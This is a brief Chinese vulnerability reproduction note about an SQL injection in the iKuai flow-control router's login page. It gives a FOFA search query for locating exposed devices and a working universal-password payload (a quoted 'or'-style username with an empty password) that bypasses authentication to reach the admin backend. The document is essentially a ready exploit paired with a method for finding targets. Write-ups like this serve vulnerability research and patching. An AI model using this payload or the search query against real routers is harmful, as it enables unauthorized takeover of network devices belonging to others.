登录 白背景

iKuai 流控路由 SQL注入漏洞

一、漏洞简介

iKuai 流控路由 存在SQL注入漏洞,可以通过SQL注入漏洞构造万能密码获取路由器后台管理权限。

二、影响版本

  • iKuai 流控路由

三、资产测绘

  • fofatitle="登录爱快流控路由"
  • 特征

image.png

四、漏洞复现

使用万能密码登陆系统

user: "or""=""or""="
pass: 空

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/kx86t3hwzf40pktl